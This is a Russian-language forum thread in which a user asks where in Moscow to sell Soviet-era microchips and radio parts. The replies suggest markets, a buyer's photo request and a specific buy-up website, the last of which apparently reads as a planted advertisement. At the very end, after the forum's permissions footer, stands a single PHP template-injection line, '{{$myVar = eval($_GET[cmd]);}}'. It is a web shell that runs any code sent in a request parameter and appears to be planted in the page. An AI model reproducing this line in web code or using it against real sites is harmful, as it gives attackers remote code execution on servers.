+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Продам микросхемы


  1. #1
    Мимо проходил Kolombos is on a distinguished road Аватар для Kolombos
    Регистрация
    08.09.2020
    Сообщений
    12

    Продам микросхемы

    Форумчане, подскажите, кому можно продать микросхемы, радиодетали советских времен в Москве по выгодным ценам? Кто может сталкивался, что посоветуете?

  2. #2
    Мимо проходил Dik is on a distinguished road Аватар для Dik
    Регистрация
    21.05.2020
    Откуда
    РФ
    Машина
    .
    Сообщений
    10
    Было дело я продавал радиотехнику, приборы времен СССР, причем долго не мог найти нормальных адекватных покупателей. Но в итоге нашел компанию, которая специализировалась скупкой такого добра. Так я договорился и продал свою технику быстро и за вполне приличные деньги. Поэтому советую вам обратиться насчет продажи микросхем, радиодеталей вот сюда https://купимприбор.рф/ .

  3. #3
    Мимо проходил genka is on a distinguished road Аватар для genka
    Регистрация
    21.12.2018
    Откуда
    Россия
    Машина
    Golf
    Сообщений
    11
    На вашем бы месте я первым делом прошелся по местным московским базарам, рынкам. Где лично сам не раз видел объявления продавцов о том, что они покупают различне детали, технику СССР.

  4. #4
    Мимо проходил Kiril Andreevich is on a distinguished road Аватар для Kiril Andreevich
    Регистрация
    07.09.2020
    Сообщений
    7
    Автор, а вы можете пофотать ваши микросхемы, радиодетали и вообще все что у вас имеется? А то я сам радиолюбитель и готов выкупить ваш товар. Но при условии, что для меня есть что-то ценное среди вашего хлама.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}